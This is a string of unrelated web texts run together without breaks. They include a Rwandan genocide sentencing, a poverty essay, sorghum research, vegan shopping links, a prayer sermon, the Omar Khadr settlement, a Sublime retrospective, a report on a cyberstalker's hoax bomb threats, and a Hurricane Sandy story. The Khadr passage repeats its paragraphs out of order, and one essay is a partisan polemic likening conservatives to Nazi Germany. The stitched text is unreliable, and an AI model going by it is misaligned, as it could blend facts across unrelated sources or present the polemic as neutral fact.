Finally, the drying. It is best to leave the toy to air dry on room temperature. You can put the toy close to a heater but not too close. If the old stuffed animal is in good condition, you can also leave it in the sun for a couple of hours. Don't do it if the stuffie is too old or brittle though.
Image copyright Getty Images Image caption Jean Uwinkindi organised and participated in attacks on minority Tutsis
Rwanda's High Court has sentenced a pastor to life in prison for his role in the 1994 genocide.
Jean Uwinkindi organised and participated in attacks on the minority Tutsi ethnic group, the court ruled.
Some 800,000 Tutsis and moderate Hutus were killed by militias from the majority Hutu ethnic group.
The 64-year-old Hutu pastor was the first genocide suspect to be sent back to Rwanda for trial by the Tanzanian-based UN tribunal.
The tribunal shut down this month after sentencing 61 individuals and acquitting 14 others.
Uwinkindi - the former head of a Pentecostal church on the outskirts of the capital, Kigali - had opposed his transfer.
Image copyright AFP Image caption Around 800,000 people were killed during the 1994 genocide
He said he would not get a fair trial in Rwanda, where there is now a Tutsi-led government.
His lawyers said he would appeal against the High Court's ruling.
"The court finds that there were killings of the Tutsi at Rwankeri and Kanzenze hills and that the attacks were led by Uwinkindi," said Judge Kanyegeri Timothee, Reuters news agency reports.
The prosecution alleged that in investigations after the genocide, some 2,000 bodies were found near the church in Kanzenze, just outside Kigali, where Uwinkindi was pastor.
He was indicted in 2011 after he was arrested in 2010 in neighbouring Uganda.
Another key suspect, Ladislas Ntaganzwa, who has a $5m (£3.2m) US bounty on him, was arrested two weeks ago in neighbouring Democratic Republic of Congo.
Federal Poverty Levels 2012
Federal Poverty Levels 2012
What is poverty? According to the federal government poverty for a family of four is $23,050 a year. The federal minimum wage is $7.25 an hour , which, if you work a 40-hour week, 52 weeks a year, you would earn $15,080 a year. The average rent cost in the United States is $808 (PDF) a month or $9,696 a year. If you use the thriftiest numbers provided by the USDA (I am assuming this is not a healthy diet) groceries for a family of four averages between $507 and $582 (PDF) a month depending on the age of the children. That is $6,084 to $6,984 a year. Food and lodging for this family of four costs between $15,780 and $16,680 a year. I have not even gotten to childcare costs yet, which for a child who is around four years old ranges $3,900 to $15,540 a year (PDF) a year. There is help for this family of four though, the average amount of SNAP benefits available to a family of four? $496 a month , not enough to pay for all of their groceries, however, it is enough to prevent starvation. Even with SNAP benefits it is obvious that in the family of four only one of the adults can work, as the other has to stay home with the children. I cannot imagine how a single parent at this level of income could keep it together let alone get out of poverty.Those are the numbers that define poverty in America; however, the definition of poverty goes much further than those numbers. The American Heritage dictionary defines poverty as, “the state of being poor; lack of the means of providing material needs or comforts.”
Let that soak in for a minute, “lack of the means of providing material needs or comforts.” Things like food, shelter, and stability. You cannot get sick, you cannot take a day off to go to the doctor, you cannot afford to go to the doctor at all. If the price of food goes up you have to take away from some other part of your budget. But what takes the hit? Is your landlord going to allow you to pay less rent? How do you buy school supplies? How do you get to and from work? None of the figures above include transportation.
Imagine living in a world where you don't know if you have enough money for your next meal, going without food so that your children may eat. Worrying about scraping together enough money to take your child to the doctor for things that most of us take for granted like immunizations. The feelings of inadequacy when your child wants nothing more than a candy bar and you cannot afford it. How grateful you feel when a stranger hands you a dollar bill to buy that candy bar and how miserable it makes you feel inside that you must depend on the kindness of strangers for such small pleasures in life. How hard birthdays and Christmases are when you cannot afford to purchase even the smallest of gifts (especially in our consumer-driven society).
According to conservative mouthpieces if you have a color TV and a refrigerator you are not poor, and several of the memes that exist today say that if you have a newer car and a cell phone you are not poor, discounting that you may have purchased that newer car or cell phone before you lost your job and lost your home. That you need to be drugged tested before you can receive any kind of benefits. The poor are second-class citizens who cannot be trusted with the meager benefits that are provided to them. They should, “just get a job,” and “pull themselves up by their bootstraps.” Great advice; however, if you are making minimum wage, you don't have bootstraps to pull up.
The same people who refuse to help the poor because they are, “lazy and shiftless,” have no problem giving a tax break, that is larger than what someone making minimum wage earns in a year, to someone who makes their money through investments, in other words, a tax break to someone who has never worked a day in their lives. Only because they have a higher social status they deserve what amounts to a government handout in the form of a tax break, while someone working for minimum wage every single day does not deserve a hand up.
While I am not a religious man I find it hypocritical that the people who claim to follow Christianity do not follow some of its core teachings. When my mom forced me to go to confirmation classes at Bashford United Methodist Church in my youth I primarily went through the motions just to make her happy; however, one quote that Rev. Rick Pearson taught me has stuck with me all these years, "If anyone has material possessions and sees his brother in need but has no pity on him, how can the love of God be in him? Dear children, let us not love with words or tongue but with actions and in truth - 1 John 3:17-18."
Sweet sorghum may be the perfect crop
QUEENSLAND UNIVERSITY OF TECHNOLOGY 26 SEP 2013
Image: Oklahoma State University Sweet sorghum is a fast growing plant with a concentration of fermentable sugars similar to those of sugarcane. Best part: researchers have shown that it has the potential to be a single source of renewable energy, animal feed and food.
A new Australian-based research study into sweet sorghum has shown the huge potential of the crop as a single source of energy, food and animal feed.
Sweet sorghum is receiving significant global interest because of its potential as a multi-product crop, however there has been minimal research under Australian growing conditions or using Australian processing facilities, until now.
Sweet sorghum is a fast growing plant that produces a stalk up to five metres tall with a high concentration of fermentable sugars at a level similar to that of sugarcane, and produces a large panicle of edible, nutritional grain similar to that of grain sorghum. Unlike many other crops used for renewable energy production, sweet sorghum can simultaneously produce food and feed co-products.
Conducted by QUT in collaboration with industry partner AgriFuels Ltd, the research looked at sweet sorghum's agronomy, its ability to be processed using existing processing infrastructure, its carbon footprint, using it to produce biofuels, and its use in food products for humans, fish and livestock.
The project's lead researcher, Associate Professor Ian O'Hara said that sweet sorghum has a wide potential cropping area, including tropical and sub-tropical Queensland, the Northern Territory, Western Australia and in temperate regions of New South Wales, Victoria and Western Australia.
"Our research showed that several varieties of sweet sorghum grew very quickly in field trials, reaching maturity in only 16-20 weeks with fermentable sugar concentrations similar to those of sugarcane under optimal conditions," Associate Prof O'Hara said.
"Our research indicates there are significant short term opportunities for the co-location of sweet sorghum and sugarcane production to increase feedstock availability for bio-ethanol production. In fact, we found that adding sweet sorghum juice to sugarcane juice resulted in higher ethanol yields than fermenting sugarcane juice alone."
Professor O'Hara said the research team also produced a range of sweet sorghum food and feed products including sweet sorghum flour, syrup, sweet sorghum-based breakfast cereal, fish and animal feed pellets and human dietary fibre products.
"When we analysed the nutritional quality and economics of these products it was shown that there are significant opportunities for manufacturing food and feed products from sweet sorghum in Australia," Professor O'Hara said.
"These products include livestock feed from sweet sorghum grain, syrup or molasses feed supplements, stock feed from sweet sorghum bagasse, and the production of mixed animal and fish feed products incorporating all three residues."
Professor O'Hara said that a carbon footprint analysis of six biorefinery process options for the conversion of sweet sorghum to fuel and animal feed products under Australian conditions was also carried out and the results were positive.
"We conducted a life cycle assessment and it determined that the aggregated effects of all sweet sorghum biorefinery products resulted in a strong net reduction in Global Warming Potential. This was true even for scenarios with the lowest sweet sorghum crop yields, so sweet sorghum biorefineries can assist in reducing carbon emissions," he said.
Professor O'Hara said Australia is well placed to establish integrated biorefineries producing sweet sorghum-based products for domestic use and for export into the Asian market.
"Sweet sorghum is one crop that has significant potential to contribute to the development of Australia's bioeconomy. Further research and commercialisation activities will be required to help develop sweet sorghum potential for commercial cultivation and processing at a large scale in Australia," Professor O'Hara said.
The research project was funded by RIRDC and industry partner AgriFuels Ltd.
The complete research report titled 'Sweet sorghum - opportunities for a new, renewable fuel and food industry in Australia' can be found here.
This media release has been republished with the permission of the RIRDC.
version="1.0" encoding="UTF-8" standalone="no"? shoe Created with Sketch. Wearing
There is no morally coherent difference between fur and other animal clothing, such as leather, wool, etc., just as there is no morally coherent distinction between meat and milk or eggs. Gary L Francione
Vegan Clothing Links
"$" denotes price range ($ = low, $$$$ = high)
$-$$Men's and women's shoes, clothing, accessories, as well as food items, vitamins, home goods and more.
$-$$All vegan store for clothing, accessories, beauty, as well as home goods and curated collections.
$-$$Vegan and environmentally-friendly sandals and simple shoes.
$-$$$$Shoes, jackets, belts, bags, wallets, etc for men and women.
$-$$Shoes for men and women, and all things vegan.
$-$$Shoes and accessories for men and women.
$-$$Shoes and accessories for women, men and kids.
$$-$$$Men's and Women's Clothes, shoes, accessories, products.
$$-$$$Italian vegan shoes for men and women.
$-$$(All vegan, despite the name) Shoes, clothes, accessories and products. (UK international orders.)
$$-$$$Vegan Boutique for Women (shoes, clothing, products).
$$-$$$$Couture women's shoes and basics.
$$-$$$$Couture women's (children's and some men's) footware.
$$-$$$$Shoes for women and men.
$-$$Vegan shoes, belt, and accessories for women and men.
$-$$Quality shoes and accessories for men and women.
$-$$Shoes for men and women.
$$$-$$$$Recycled plastic designer shoes.
$-$$Vegan, eco-friendly, high quality ballet slippers. Comes in three colors.
Women Only
$-$$Shoes for Women
$$-$$$Vintage style shoes, clothing and accessories for women. International customers place order inquiries here
$$-$$$Women's Shoes
$$-$$$$Women's shoes and basics.
$-$$$$Women's apparel and accessories
$$-$$$$Women's Shoes
$$-$$$$Women's Shoes
$$-$$$$Women's Shoes
$-$$$Cases, bags, wallets with a focus on supporting local artists.
Men Only
$$$-$$$$All mens shoe collection.
$-$$Mens shoes, clothes, ties, cologne and more.
$$-$$$French brand of stylish shoes for men.
$-$$$Cases, bags, wallets with a focus on supporting local artists.
$$$-$$$$All mens shoe collection.
Coats
$-$$Coats for women and men.
$-$$$Special section for winter gear including a peacoat and pleather jacket.
$-$$$$Offering jackets, shirts, sweatshirts and outerwear.
$$-$$$Features a winterwear category for men and women.
$$$-$$$$Coats for men and women.
Bags
$$-$$$Wide selection of stylish bags
$-$$Designer of vegan bags that are both affordable and fashionable.
$$$-$$$$Luxury designer bags for men and women.
$-$$Messenger bags and some clothing for men and women.
Miscellaneous
$$-$$$An all-vegan line of guitar straps with a wide selection of styles.
$-$$One of our favorite vegan shoe designers. Roni Kantor's shoe line is adorable and stylish.
$$$-$$$$Minka bag From Matt and Natt.
$$$-$$$$Special vegan heavy-duty workout gloves from NewGrip
$$-$$$Stylish dancing shoes for men and women.
$-$$Beautiful ballet shoes with materials that are soft yet made to perform.
$-$$Identical to the classic Birkenstock shoe style, EthicalWares offers a decent selection of this simple sandal shoe.
What do Vegans Wear?
The selection of items and analogues available for vegan to wear is so wide, it's simply impossible to tell someone is a vegan by looking at their belt, shoes, or coat.
Some vegans will shop at specialty all-vegan stores while others order online. Either way, vegan clothing, shoes, and accessories are actually affordable and stylish. Like shopping for anything else, it's all about finding good deals.
What's Wrong with Wool?
The reason for avoiding leather is probably more obvious than avoiding wool. However, while the practice of taking wool off a sheep does not immediately require killing, sheep are still property. This means they are bred and enslaved to be products for humans. Often they are bred genetically to grow so much skin (and therefore wool) they form folds in which insects lay eggs. Producers must then cut off these folds in a process called "mulesing." After their "productivity" declines, they are sent to slaughter.
More on wool production
Leather
Leather isn't merely a "by-product" of the beef industry. In fact, most leather doesn't even come from the same type of cow used for beef.
Even if this were the case, it's important, again, to think of what we do to animals not in terms of "inflicting suffering," but their property status. If an animal is killed to create two different products, what sense does it make to say one product is a by-product while the other is the real thing? Animals are killed because their dead bodies can be sold in the form of various products.
Recycled/Secondhand
Is it vegan to buy products second-hand which contain leather or wool? After all, since they already exist, one is not causing additional suffering. It's important, again, not to think of this purely as an issue of "inflicting suffering." If you have seen the video of Herbie on the Why page, acting much like a puppy, ask yourself why a vegan would even want to wear that being's body regardless of the economic effect it has?
Being vegan means acknowledging the notion that animals are not lifeless objects which are on the planet for all of us humans to use.
So regardless of the amount of suffering you may not be causing to an animal, is it in line with your own beliefs to wear the body parts of murdered animals?
Our nation was founded by men who believed in prayer. When our government was being formed, Benjamin Franklin addressed the chairman of the Constitutional Convention meeting at Philadelphia in 1787, saying, “I have lived, sir, a long time, and the longer I live the more convincing proofs I see of this truth: that God governs in the affairs of men. And if a sparrow cannot fall to the ground without His notice, it is probable that an empire cannot rise without His aid.”
Today the world is being carried on a rushing torrent of history that is sweeping out of control. There is but one power available to redeem the course of events, and that is the power of prayer by God-fearing, Christ-believing people.
We would adapt the words of Benjamin Franklin to our day and say, “It is probable that a nation cannot keep her freedom without the aid of Almighty God.” Our first president, George Washington, led his armies to victory, but not until he had first taken time alone to invoke God's blessings upon their cause.
Down through our history our nation's leaders have carried their plans and hopes to God in prayer. Yet today we have come to a place where we regard prayer in our national life simply as a venerated tradition. We have no sense of coming to grips with God; we simply use prayer as a formality.
If this nation was born in a meeting based on prayer—some of its most important decisions being made only after careful prayer to God—how can we go on unless there is a renewed emphasis on prayer today? One of the reasons the United Nations has become so ineffective in handling world situations is that there is no prayer, no recognition of God. Unless the leaders of nations turn to God in prayer, their best plans will fail, just as did the plans of those who built the tower of Babel.
There are thousands of people who say prayers only in times of great stress, danger or uncertainty. I have been in airplanes when the motor died out, and people started praying. We have flown through bad thunderstorms, when all around us people who never before thought to pray were praying. It is instinctive for people to pray in a time of trouble.
Christ instructed His followers to pray, both by teaching and by example. So fervent and so direct were His prayers that one time when He had finished praying, His followers turned to Him and said, “Lord, teach us to pray” (Luke 11:1). They knew that Jesus had been in touch with God, and they wanted to have such an experience.
On another occasion He taught them to pray by way of illustration—through a parable. He told of the widow and the unjust judge who rendered her a favorable decision not because he feared her, but because of her perseverance. So Jesus said that men ought always to pray.
From one end of the Bible to the other there is the record of those whose prayers have been answered—people who turned the tide of history by prayer. Abraham prayed, and as long as he prayed, God did not destroy the city of Sodom where Abraham's nephew, Lot, was living.
Hezekiah prayed when his city was threatened by the invading armies of the Assyrians under the leadership of Sennacherib, and the entire army of Sennacherib was destroyed and the nation was spared for another generation—because the king prayed.
Even though America is just as wicked as Sodom and Gomorrah ever were, and as deserving of the judgment of God, God would spare us if we were earnestly praying, with hearts that had been cleansed and washed by the blood of Christ.
The problems of the world will never be settled unless our national leaders go to God in prayer. If only they would discover the power and wisdom that there is in reliance upon God, we could soon see the solution to the grave problems that face the world!
Elijah prayed, and God sent fire from Heaven to consume the offering of the altar he had built in the presence of God's enemies. Elisha prayed, and the son of the Shunammite woman was raised from the dead. Daniel prayed, and the secret of God was made known to him, for the saving of his companions and the changing of the course of history.
Jesus prayed at the door of the tomb of Lazarus, and the one who had been dead for four days came forth. The thief prayed, and Jesus assured him that this day he would be with Him in Paradise. Paul prayed, and hundreds of churches were born in Asia Minor and Europe. Peter prayed, and Dorcas was raised to life. John Knox prayed, and the results caused Queen Mary to say that she feared the prayers of John Knox more than she feared all the armies of Scotland.
John Wesley prayed, and revival came to England, sparing her the horrors of the French Revolution. Jonathan Edwards prayed, and revival came to Northampton, where more than 50,000 people joined the churches. History has been changed time after time because of prayer. I tell you, history could be altered and changed again if people went to their knees in believing prayer.
What a glorious thing it would be if millions of us would avail ourselves of the greatest privilege this side of Heaven! Jesus Christ died to make communion and communication with the Father possible. He told us of the joy in Heaven when one sinner turns from sin to God and breathes the simple prayer, “God, be merciful to me a sinner” (Luke 18:13).
In this modern age in which we live, we have learned to harness the power of the atom, but very few of us have learned how to fully develop the power of prayer. We have not yet learned that a man is more powerful on his knees than behind the most powerful weapons that can be developed. We have not learned that a nation is more powerful when it unites in earnest prayer to God than when its resources are channeled into defensive weapons. We have not discovered that the answer to our problems can be through contact with God.
Many of you do not know how to pray. Why don't you start now by saying, “God be merciful to me, a sinner”? Let God forgive all your past sins, transform your life and make you a new person. He can do it now in answer to your prayer. That simple, direct prayer will open new horizons of spiritual victory for you and add a new dimension to your life. ©1962
Scripture quotations are taken from the Holy Bible, New King James Version.
Khadr was 15 when he was captured by U.S. Special Forces following a shootout in Afghanistan in 2002. He was charged with “murder in violation of the laws of war,” accused of throwing a grenade that killed U.S. Army medic Sgt. Christopher Speer and injured Sgt. Layne Morris, who lost an eye.
Khadr's lawyers argued that Canada violated international law by failing to protect Khadr, a Canadian citizen, from his ordeal in Guantanamo. His suit further alleged a cross-border conspiracy to keep him detained.
The details of the settlement haven't been made public yet, but according to the Toronto Star, it'll be between $10 million, the amount paid to Maher Arar after a judicial inquiry found his detention and torture in Syria was a direct result of intelligence provided by Canada to the United States, and $20 million, the amount sought in the civil suit brought forward by Khadr.
The Canadian government is set to offer Omar Khadr an apology and at least $10 million in compensation for the abuses he suffered during his detention by the U.S. in Afghanistan and Guantanamo Bay, according to several media reports.
Read more
The Canadian government is set to offer Omar Khadr an apology and at least $10 million in compensation for the abuses he suffered during his detention by the U.S. in Afghanistan and Guantanamo Bay, according to several media reports.
The details of the settlement haven't been made public yet, but according to the Toronto Star, it'll be between $10 million, the amount paid to Maher Arar after a judicial inquiry found his detention and torture in Syria was a direct result of intelligence provided by Canada to the United States, and $20 million, the amount sought in the civil suit brought forward by Khadr.
Khadr's lawyers argued that Canada violated international law by failing to protect Khadr, a Canadian citizen, from his ordeal in Guantanamo. His suit further alleged a cross-border conspiracy to keep him detained.
Khadr was 15 when he was captured by U.S. Special Forces following a shootout in Afghanistan in 2002. He was charged with “murder in violation of the laws of war,” accused of throwing a grenade that killed U.S. Army medic Sgt. Christopher Speer and injured Sgt. Layne Morris, who lost an eye.
Read more: In Emails, Hillary Clinton Praised the Release of Guantanamo Detainee Omar Khadr
Khadr himself was severely injured in the firefight, and blinded by shrapnel in one eye. In 2010, he pleaded guilty to the charge. Later, in media interviews, Khadr has said he doesn't know if he threw the grenade and that he saw the plea deal as the only way of escaping the prison, where his lawyer said he was subjected to solitary confinement and sleep deprivation.
The Associated Press reported on Tuesday that Speer's widow and Morris have already filed an application in a Canadian court asking it to enforce a U.S. judgement in a wrongful death lawsuit that awarded Speer's family and Morris $134 million.
“We will be proceeding with that application and trying to make sure that if he gets money, it goes to the widow of Sgt. Speer and Layne Morris for the loss of an eye,” Don Winder, lawyer for both families, told The Associated Press.
In 2010, Canada's Supreme Court ruled that the actions of Canadian intelligence officials who were involved in the U.S.' interrogations of Khadr had violated “the most basic Canadian standards about the treatment of detained youth suspects” and they obtained evidence from him under “oppressive circumstances.”
Khadr is the only person who has been prosecuted by the U.S. for murder under the Military Commissions Act, drafted after 9/11, which made it a war crime to kill a soldier in a war zone.
Khadr was returned to Canada in 2012, after spending a decade in a detention facility in Guantanamo, and continued to be incarcerated until 2015, when he was granted bail by a Canadian court. He has since been supported by Edney and his wife, in Edmonton, where he recently moved into his own apartment. He is planning to attend school to become a nurse in the fall.
Nineteen years ago Monday, Bradley Nowell, lead singer and songwriter for the '90s surf punk band Sublime, was found dead in a San Francisco hotel room. The band found Nowell, who was 28, lying on a bed with Lou Dog, his beloved dalmatian and the band's mascot, whimpering by his side. He became yet another tragic heroin casualty in rock 'n' roll history.
But while the ska-tinged California punk sound Nowell pioneered has fallen out of vogue, his songs remain relevant as ever. Sublime is nostalgically remembered as a stoner party band, but so many of Nowell's songs dug far deeper. His music dealt with many of the same social issues we face today — including police brutality, addiction and marijuana legalization. The unflinching and sharply satirical eye Nowell offered these subjects should serve as a model for generations of songwriters to come.
Scrappy start: Nowell and Sublime got their start in the scrappiest, most punk way possible — by stealing studio time. They allegedly recorded their debut album, 40oz. to Freedom, by sneaking into studios at California State University, Dominguez Hills. Signs of social consciousness were evident from the beginning, but by their third record and major label debut, they were well past their party rock days and were including sharp social and political commentary throughout their laid-back slacker anthems.
"April 29, 1992" shares its title with the date of the 1992 race riots in Los Angeles and around the country, after the verdict was handed down on Rodney King's 1991 beating by police. The narrative is anarchic, but in the midst of the chaos, Nowell made a powerful statement about police brutality and racism: "They said it was for the black man / They said it was for the Mexican, and not for the white man / But if you look at the streets it wasn't about Rodney King / It's bout this fucked up situation and these fucked up police."
It's advice to look to the systems that create racist policing — to look beyond the individual events. And it's advice we can all take to heart as we look to push today's anti-police brutality movements into more productive territory.
Nowell wove in grim illustrations of his own struggles with addiction and depression. On "Garden Grove," the album's opening track, Nowell sings: "Getting hassled by the man / Waking up to an alarm / Sticking needles in your arm / Picking up trash on the freeway / Feeling depressed every day."
His songs offer some of the some of the more uptempo depictions of depression in music. In their quirky way, they push back against the stigma of depression that cause so many to suffer in silence — biases many musicians still battle in their music. His stories of addiction, like "The Ballad of Johnny Butt," shed light on a tragically overlooked and consistently stigmatized community.
Source: Mic/Tumblr
But the band had a healthy take on other drugs. One of the causes the band championed above all else was legal weed. Sublimed popularized some of the most memorable stoner anthems of all time, including "Smoke Two Joints," "What I Got" and "Burritos."
But it wasn't just about getting high. They offered conscious elements to their weed talk. In contributing to the first Hempilation, a compilation CD benefiting the National Organization for the Reform of Marijuana Laws, they performed "Legalize It," Peter Tosh's conscious stoner anthem. "Doctors smoke it, lawyers smoke it / Sound guy smokes, even my dog tokes it," Nowell sings riffing on the lyrics, before touting its medical benefits: "Only cure for glaucoma / Only cure for asthma."
In 2013, Sublime drummer Bud Gaugh discussed his hopes that the band had a positive impact on the legalization movement, with Celeb Stoner. "I sure would like to hope so," he said. "It's a shame it's criminalized. It is medicine. I've got two friends who've got cancer right now. They need it!"
Perhaps the saddest part of Nowell's passing is he never had the chance to enjoy the band's mainstream success. He passed before the band's breakout album, Sublime, saw its release. But the music Nowell wrote left its mark.
"His voice is like candy to your ears," Gwen Stefani, the lead singer of No Doubt said in 1996, according to the Los Angeles Times; Stefani had recorded two songs with Nowell. "Bradley definitely had a gift, and it sickens me that I'm not going to be able to enjoy his voice anymore. It's not sad for him — he's gone — but it's sad for everybody else. He had such a huge impact on so many people in the whole [local music] scene."
"Sublime endure because of the way, lyrically, Brad would make you feel," Miles Doughty, the lead singer of Slighly Stoopid, a band that has continued to push Sublime's mixture of ska, punk and dub, told OC Weekly in 2013.
"Just like Nirvana helped to change from the hair-metal stage to the grunge rock of the '90s, Sublime did the same thing, changing the whole grunge sound ... When you're a musician like that, it's timeless; it'll last forever." There's far more to that legacy than most people realize.
Correction: May 26, 2015
An earlier version of this article implied that Rodney King died after being beaten by police in 1992. King died in 2012, and his assault by police officers took place in 1991.
Germany, under Hitler, defined fascism with its attendant brutality, and brought its ugly face to the world's attention. Like the right wing everywhere, it sought to present a contrived rational for its existence, while trying to hide its crimes against humanity. When the truth won out, all it had left was the horror, the scorn, the disgust that humanity reserves for the monstrous. The smoking remnants of a nation lay broken, and its people were hesitantly recognized as human. Americans should take careful note.
Germany celebrated its heyday over the bones of the dead, and few Germans were aware enough to understand the contradiction of their imagined superiority over the weak, the dispossessed. They still bear the burden of that pain over 60 years later. Even the most casual student of history knows that nations bury themselves over the prospect of change. They realize that Germans saw in Hitler salvation, even though nothing threatened them. Hitler made Germans feel entitled to whatever it was they could claim as their own, and to hell with anyone who stood in their way.
The U.S, under Bush, would seem to bend to the same, aimless ambitions as Germany at war. Americans keep confirming the same themes the republicans insist are vital. Fiscal responsibility! They rave. As they run up the national debt to unprecedented heights. Freedom! They shout. As bombs are dropped on foreign lands and innocent people are murdered while the Constitution is diminished, subverted, disrespected, and why? Personal responsibility! They cry. As U.S. corporations need another taxpayer funded handout to correct their unregulated greed.
Conservatives dread the light of day. They know that if their true motives are revealed, they'll be lucky to get away with their lives. If they didn't have an iron grip on media, they'd be banished, like any monster would, and preferably tarred and feathered on the way out.
The right wing's history is in acting as corporate shill. Corporate has no motive to understand morality so it must have a defense, an explanation for its lack. It is the right wing's job to provide it. The care that human beings demonstrate for each other is a threat to the corporate bottom line. Compassion is a concept outside the province and interest of corporate law. The motives that drive a man or women to challenge the impossible are unwelcome, and even threatening, in a plutocratic, corporate society. Art is reduced to advertising, for in the corporate world imagination is not welcome. It doesn't fall within the boundaries of strict definition. It's not something that can be held, weighed, and measured so what possible use could it have to the corporate mentality?
Art is the medium, the window, through which humanity may catch a fleeting glimpse of itself. It allows, for an instant, that humanity may take an objective view of where it's been and where it's going. It's a huge threat to the corporate function. That's why advertisement is the public art. For advertisement celebrates the material, and art attempts to examine the intangible depths of the human soul. It asks that humanity look inward to its true nature - to the motives for its existence. The corporate world can't recognize humanity, nor the moral tenants that guide it. It can't concern itself with ordinary care outside of profit. It must restrict itself to its only function - bottom line profit, no matter the expense in human terms. Art, and the human imagination, threatens its existence.
Millions of Americans are ready and anxious to vote for Bush ll, the senile version. Why so many voters would do such a thing is entirely outside the province of rational explanation. Bush, one man, has visited fiscal disaster upon the nation. He has also presented the U.S. as an imperialist nation, willing to invade sovereign states for corporate opportunity, thinly disguised as freedom. If one such man may decide the fate of so many, then some assessment of their character, honor, and intelligence, seems vital.
Americans failed to hold Bush to any qualifier, and their reward is richly deserved. The ones who saw it coming and had to watch it unfold, like an automobile accident in slow motion, will be dragged down right along with the rest of the herd, which, it seems, is poised again to abandon all caution in their support of McCain, a mere codification of the previous eight years. Even a dumb animal learns that after it's been burned a few times it doesn't revisit the source of its injury.
Americans remain largely ignorant of the right wing's historical role in concentrating wealth among a comparative few. The robber barons of the late 19th century, and the grand opulence of the roaring twenties, were republican high points before Americans shook themselves awake and recoiled in horror at conservative excess. Upton Sinclair's, The Jungle, helped Americans understand the forces that would undermine democracy. Certain men, driven by unfettered greed, will casually abandon all consideration of moral allowance in their driven pursuit of more, more, more. This is a form of mental illness.
Conservatism's chief interest is in enriching themselves at other's expense. This doesn't tie to the democratic principle of governance by the majority, where the individual does matter, and the desires and needs of the minority are recognized, and if possible, addressed. Conservatives, on the other hand, deliberately disqualify minorities as drags on economy, or even insurrectionists, who would bring harm to the nation. This scare tactic dovetails nicely into the public's installed fear of minority groups. Divide and conquer.
As much as they try to disguise their hatred of anyone unlike themselves, they reveal their ambition to destroy. If only they would tell the truth, that ignorance is bliss, but only until the bill comes due. War is their forte', and peace is only a convenient pause while dividing up the loot before their next target is selected, whether it be foreign or domestic. The world is growing more finite daily, and the corporate struggle is in grabbing as much claim to material as possible.
Those who fight wars do so knowing that sacrifice is their burden, and the resultant world should be a new, and better place. Those dead soldiers, who stormed the beaches against the stuttering German machine guns, summoned their impossible bravery from the realization that without their charge at certain death the world would be a darker place. The American soldiers, fighting in Iraq, are given to understand that their war is unending, that it can't be won.
The aftermath of WWlI saw the collective efforts of the victors devoting every resource to bring the humiliated losers, the murderous outlaws of the world's community, back into the human fold. The victors did this in gratitude to their dead, who kept the wolf, the ever creeping, relentless tide of fascism, away from their doors.
Conservatism would protest against helping the vanquished. Let them eat cake, it would say. No matter its disguise, conservatism always concerns itself with the condemnation of human spirit. It insists on mass conformity to realize its ends. It must punish human transcendence to realize its own, narrow boundaries. Its material infatuation is unshakeable, and it has no tolerance for any view but its own. It sees the human struggle in terms of possible advantage for itself. It can't grasp the salient truth that humanity is its causation, and any diminishment of humanity is its own.
Any disposition of human spirit is an affront to its aim. It demands of humanity precisely what humanity can't give - its collective surrender to sameness. Conservatism asks that equality be universal, without character or form. Conservatism is a colorless world, without the spontaneity of human inspiration. It doesn't recognize humanities long history of overcoming impossible odds. It doesn't welcome humanity with its incredible diversity of thought. It can only understand its own narrow aim, that like mules, human beings must be presented a carrot on a stick. Conservatism is constantly threatened by its black and white perception of the world, while humanity is intuitively unwilling to deny its collective dream of individual determination, that is only restricted by imagination.
_______
Thompson's motive, according to the FBI was to cause his ex-girlfriend emotional distress. He has also been charged with cyberstalking.
In July 2016, Thompson sent emails to his former girlfriend's employer filled with defamatory information about her. Shortly thereafter she filed for an order of protection, which she has renewed twice.
Rather than leaving her alone after the protective order was in place, Thompson ramped up his harassment. He anonymously threatened to release nude photographs of her to the public, sent additional emails to her employers — including one which said she had threatened to kill him — and he called in a tip that she possessed child pornography.
Thompson also began a campaign to paint his ex as violently anti-Semitic. He began by sending anonymous faxes to her job, which showed a fake social media profile for her filled with anti-Semitic statements.
In late January and early February Thompson's actions escalated, according to authorities. He sent threatening emails to the Jewish History Museum, a Jewish School in Manhattan, and another in Michigan. Thompson sent the emails from an imaginary third party, claiming that Juan Thompson put bombs in their buildings, and in three cases, said that “Juan” was “eager for a Jewish Newtown”.
Thompson allegedly switched tactics in late February, contacting ADL, CAIR and a Jewish Community Center in San Diego, claiming his ex-girlfriend had planted a bomb at their facilities.
During this time, Thompson was posting messages on his Twitter account in support of the JCCs and critical about the threats they were receiving.
Law enforcement was able to trace the IP address he was using. After interviewing and investigating Thompson, a warrant was issued for his arrest.
This was not the first time Thompson had pretended to be someone else through email. He was fired from The Intercept for fabricating quotes and sources; most notably an imaginary cousin of Dylan Roof's named Scott.
A reporter for the Riverfront Times who wrote about Thompson's termination says that Thompson harassed him. He claims that Thompson set up fake social media accounts where he pretended to be a woman who alleged that the reporter had sexually assaulted her.
Thompson's own social media account paints a picture of a man who has antipathy toward not only his ex, but all Caucasian people. In the past two weeks, he has written on Twitter that “white folk are trash” three separate times, called them “vile ilk”, said they “have no shame”, and called the white media repulsive.
Thompson was apprehended in St. Louis, Missouri and is being held without bail. The Justice Department's General Crimes Unit and Offices of Terrorism and International Narcotics are handling his prosecution
The cards arrived by the thousands in response to a Facebook posting and a Daily Beast report asking for new ones to replace those from family and friends that 87-year-old Patsy Roberts of Rockaway, Queens, had been saving for decades to read in her final hours only for them to be destroyed by Hurricane Sandy.
And these 12,000 new cards were not only from the United States, but also from Australia and New Zealand and Canada and China and Korea and Japan and Kenya and Lebanon and Nigeria and Latvia and India and Haiti and Germany and Morocco and the Philippines and Malaysia and Greece and Slovenia and Iceland and Sweden and Mexico and seemingly every other country on earth.
“When the cards started to come, I had to cheer up,” she says. “I had no choice.”
She adds, “It's the most wonderful experience I ever had.”
She goes on to report, “I had two invitations to weddings. One was in California.”
She was moved not just by the magnitude of the response but by the thought and care that went into each card, be it from Mayor Michael Bloomberg, Cardinal Timothy Dolan, or a youngster named Jeremy who assured her that her lost cards would be waiting for her “on the other side.” Jeremy included a drawing of an angel leading Roberts into heaven.
“By the hand,” Roberts notes.
On their part, the writers were clearly moved not just by the loss of her cards, but also by the description of her in the Daily Beast story. She is so buoyantly energetic that she takes two-mile walks on the Rockaway beach at a pace that exhausts her grandchildren. And on the way back from daily mass, she performs such secular devotions as putting her neighbors' trash cans back in front of their houses and placing on the doorstep any newspapers the deliverer has just tossed on the sidewalk.
“I hate to pass by a house, especially if I know they're working,” she says. “It'll be easier for them to just open the door and pick up the paper.”
